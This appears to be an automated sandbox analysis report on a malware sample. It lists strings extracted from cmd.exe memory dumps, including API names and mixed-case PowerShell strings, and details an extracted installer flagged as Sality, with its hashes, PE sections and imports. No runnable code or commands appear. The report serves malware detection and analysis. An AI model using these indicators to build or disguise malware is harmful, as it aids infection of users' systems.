Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetThreadGroupAffinity

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetThreadLocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetTickCount

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetTimeFormatW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetUserDefaultLCID

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVDMCurrentDirectories

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVersion

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVolumeInformationW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVolumePathNameW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetWindowsDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GlobalAlloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GlobalFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapAlloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapReAlloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapSetInformation

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapSize

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HH:mm:ss t

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HIGHESTNUMANODENUMBER

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ication

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

IF /?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

InitializeCriticalSection

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

InitializeProcThreadAttributeList

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

InterlockedCompareExchange

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

InterlockedExchange

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

IsDebuggerPresent

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

iswalpha

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

iswdigit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

iswspace

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

iswxdigit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

KERNEL32.DLL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

KERNEL32.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

LeaveCriticalSection

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

LoadAppInit_DLLs

Unicode based on Runtime Data (cmd.exe )

LoadLibraryExA

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

LoadLibraryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Local

Unicode based on Runtime Data (cmd.exe )

LocalFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

longjmp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

lstrcmpiW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

lstrcmpW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MachinePreferredUILanguages

Unicode based on Runtime Data (cmd.exe )

memcpy

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

memmove

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

memset

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

mkdir

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MM/dd/yy

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MoveFileExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MoveFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

mpletionChar

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MPR.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MSPEC

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

msvcrt.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MultiByteToWideChar

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NCCheck

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NeedCurrentDirectoryForExePathW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NORMAL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

NtClose

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ntdll.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NTDLL.DLL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtFsControlFile

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtOpenProcessToken

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtOpenThreadToken

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtQueryInformationProcess

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtQueryInformationToken

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtSetInformationProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Null environment

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

OpenThread

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

PARATE

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

PathCompletionChar

Unicode based on Runtime Data (cmd.exe )

PATHEXT

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

PoWerShell.exe

Unicode based on Runtime Data (cmd.exe )

PoWerShell.exe"*

Unicode based on Runtime Data (cmd.exe )

pqacG%%apppppppaB

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

PreferExternalManifest

Unicode based on Runtime Data (cmd.exe )

printf

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

PROMPT

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

PSPUBWS

Unicode based on Runtime Data (cmd.exe )

pushd

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

qsort

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

QueryFullProcessImageNameW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

QueryPerformanceCounter

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RANDOM

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ReadConsoleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ReadFile

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ReadProcessMemory

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

realloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

REALTIME

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

Redir:

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegCloseKey

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegCreateKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegDeleteKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegDeleteValueW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegOpenKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegQueryValueExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegSetValueExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

REM /?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

REM/?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RemoveDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ResumeThread

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ription

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

RLEVEL

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

RMDIR

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

rmdir

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RtlDosPathNameToNtPathName_U

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RtlFindLeastSignificantBit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RtlFreeHeap

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RtlNtStatusToDosError

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SafeDllSearchMode

Unicode based on Runtime Data (cmd.exe )

SCRIPT

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ScrollConsoleScreenBufferW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Se%ae`

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

SearchPathW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SEPARATE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

SetConsoleCtrlHandler

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleCursorPosition

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleInputExeNameW

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleMode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleTextAttribute

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleTitleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetCurrentDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetEndOfFile

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetEnvironmentStringsW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetEnvironmentVariableW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetErrorMode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetFileAttributesW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetFilePointer

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetFilePointerEx

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetLastError

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

setlocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetLocalTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetProcessAffinityMask

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetThreadLocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetThreadUILanguage

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetUnhandledExceptionFilter

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SHARED

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

SHELL32.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

skip=

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Sleep

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Software\Classes

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

Software\Microsoft\Command Processor

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Software\Policies\Microsoft\Windows\System

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

srand

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

START

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

StringFileInfo

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

swscanf

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

System

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SystemTimeToFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

tCodeAscii

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

TerminateProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

TLOCAL

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

tokens=

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

towlower

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

towupper

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Translation

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

TransparentEnabled

Unicode based on Runtime Data (cmd.exe )

Ungetting: '%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

UnhandledExceptionFilter

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Unknown

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

UpdateProcThreadAttribute

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

useback

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

usebackq

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

USER32.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Users

Unicode based on Runtime Data (cmd.exe )

VirtualAlloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

VirtualFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

VirtualQuery

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

VS_VERSION_INFO

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

WaitForSingleObject

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ware\Microsoft\Command Processor

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcschr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcsncmp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcsrchr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcsspn

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcsstr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcstol

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcstoul

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WideCharToMultiByte

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WINBRAND.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WriteConsoleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WriteFile

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ws Command Processor

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwwwwwwwwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

xitCode

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

xpansion

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

xsatz

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

XTVERSION

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

yy/MM/dd

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Ansi based on Runtime Data (exE )

(xL

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

.DEFAULT\Control Panel\International

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

Ansi based on Runtime Data (exE )

/** *Datanavigator is a web application development tool by Frank van den Heuvel. *Copyright

Ansi based on Runtime Data (exE )

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

=v<j=v

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

\Microsoft\Internet Explorer\Quick Launch

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

\ThemeApiPort

Unicode based on Runtime Data (exE )

_w+E`w

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (exE )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (exE )

AlwaysShowExt

Unicode based on Runtime Data (exE )

AppendMenuW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Attributes

Unicode based on Runtime Data (exE )

AutoCheckSelect

Unicode based on Runtime Data (exE )

BeginPaint

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

BrowseInPlace

Unicode based on Runtime Data (exE )

CallForAttributes

Unicode based on Runtime Data (exE )

CallWindowProcW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Extracted Files

Malicious 2

Roaming.exE

Overview Download Disabled Extended File Details VirusTotal Report Hash Seen Before

Size
211KiB (215649 bytes)

Type
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive

AV Scan Result
Labeled as "virus.win32.sality" (13/57)

Runtime Process
powershell.exe (PID: 2612)

MD5

1ab0e4452a4feaa8c382cf2943023920

SHA1

4a3103c29b54ddb4d83b0b2d2ad0846f4f275a92

SHA256

2586f39b57bd74439b539abe51b686389526047c806f059413602767f98d864d

Extended File Details

Roaming.exE

Filename: Roaming.exE
Size: 211KiB (215649 bytes)
Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Architecture
: 32 Bit
MD5
: 1ab0e4452a4feaa8c382cf2943023920
SHA1
: 4a3103c29b54ddb4d83b0b2d2ad0846f4f275a92
SHA256
: 2586f39b57bd74439b539abe51b686389526047c806f059413602767f98d864d
SHA512
: 53012c85a7c565eadfbf5d4f3844b7c66df1c1b5ca3502c5865122994b0681554bb9e4c3bb0b9ea660904faddc26013d624d60dc4d7824e8ab52fd25e5af40ca
ssdeep
: 6144:By9v17kwzovE3odYgD483wIhsVV4rRgSEQi:U97kXvZ485hXrRvI
imphash
: 7ed0d71376e55d58ab36dc7d3ffda898
authentihash
: e5709928484e3e7e64d75831d74133e8737b069b31b8c71d469c6eb63a016b8f

File Sections

Details	Name	Entropy	Virtual Address	Virtual Size	Raw Size	MD5
Name .text Entropy 6.4806797674 Virtual Address 0x1000 Virtual Size 0x6112 Raw Size 0x6200 MD5 2316372a689cbafe482f40a1594e185b	.text	6.4806797674	0x1000	0x6112	0x6200	2316372a689cbafe482f40a1594e185b
Name .rdata Entropy 4.94596488017 Virtual Address 0x8000 Virtual Size 0x1460 Raw Size 0x1600 MD5 0aa2dc336f7337ed3785ee2afeacae36	.rdata	4.94596488017	0x8000	0x1460	0x1600	0aa2dc336f7337ed3785ee2afeacae36
Name .data Entropy 3.8882982978 Virtual Address 0xa000 Virtual Size 0x2afb8 Raw Size 0x600 MD5 c3697bba48f9f8dc6bd7554070da9a71	.data	3.8882982978	0xa000	0x2afb8	0x600	c3697bba48f9f8dc6bd7554070da9a71
Name .ndata Entropy 0 Virtual Address 0x35000 Virtual Size 0x23000 Raw Size 0x0 MD5 d41d8cd98f00b204e9800998ecf8427e	.ndata	0	0x35000	0x23000	0x0	d41d8cd98f00b204e9800998ecf8427e
Name .rsrc Entropy 5.81605693279 Virtual Address 0x58000 Virtual Size 0x4b60 Raw Size 0x4c00 MD5 2e565fe3d88b4afb888bfb4f5839e103	.rsrc	5.81605693279	0x58000	0x4b60	0x4c00	2e565fe3d88b4afb888bfb4f5839e103

File Imports

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegDeleteValueW

RegEnumKeyW

RegEnumValueW

RegOpenKeyExW

RegQueryValueExW

RegSetValueExW

ImageList_AddMasked

ImageList_Create

ImageList_Destroy

CreateBrushIndirect

CreateFontIndirectW

DeleteObject

GetDeviceCaps

SelectObject

SetBkColor

SetBkMode

SetTextColor

CloseHandle

CompareFileTime

CopyFileW

CreateDirectoryW

CreateFileW

CreateProcessW

CreateThread

DeleteFileW

ExitProcess

ExpandEnvironmentStringsW

FindClose

FindFirstFileW

FindNextFileW

FreeLibrary

GetCommandLineW

GetCurrentProcess

GetDiskFreeSpaceW

GetExitCodeProcess

GetFileAttributesW

GetFileSize

GetFullPathNameW

GetLastError

GetModuleFileNameW

GetModuleHandleA

GetModuleHandleW

GetPrivateProfileStringW

GetProcAddress

GetShortPathNameW

GetSystemDirectoryW

GetTempFileNameW

GetTempPathW

GetTickCount

GetVersion

GetWindowsDirectoryW

GlobalAlloc

GlobalFree

GlobalLock

GlobalUnlock

LoadLibraryA

LoadLibraryExW

LoadLibraryW

lstrcatW

lstrcmpiA

lstrcmpiW

lstrcmpW

lstrcpyA

lstrcpynW

lstrcpyW

lstrlenA

lstrlenW

MoveFileW

MulDiv

MultiByteToWideChar

ReadFile

RemoveDirectoryW

SearchPathW

SetCurrentDirectoryW

SetEnvironmentVariableW

SetErrorMode

SetFileAttributesW

SetFilePointer

SetFileTime

Sleep

WaitForSingleObject

WideCharToMultiByte

WriteFile

WritePrivateProfileStringW

CoCreateInstance

CoTaskMemFree

OleInitialize

OleUninitialize

SHBrowseForFolderW

ShellExecuteW

SHFileOperationW

SHGetFileInfoW

SHGetPathFromIDListW

SHGetSpecialFolderLocation

AppendMenuW

BeginPaint

CallWindowProcW

